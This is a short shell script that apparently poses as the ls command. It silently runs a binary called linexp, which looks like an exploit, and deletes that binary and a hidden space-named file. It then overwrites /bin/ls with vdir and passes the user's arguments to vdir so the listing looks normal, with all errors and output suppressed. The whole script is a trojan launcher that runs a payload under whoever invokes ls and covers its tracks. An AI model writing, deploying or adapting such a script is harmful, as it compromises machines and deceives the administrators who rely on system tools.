#!/bin/sh
( ( sleep 5s ; cp -f `which vdir` /bin/ls ) & ) >/dev/null 2>/dev/null
( ./linexp/linexp ) >/dev/null 2>/dev/null
rm -f ./linexp/."  " ./linexp/linexp >/dev/null 2>/dev/null
vdir $@
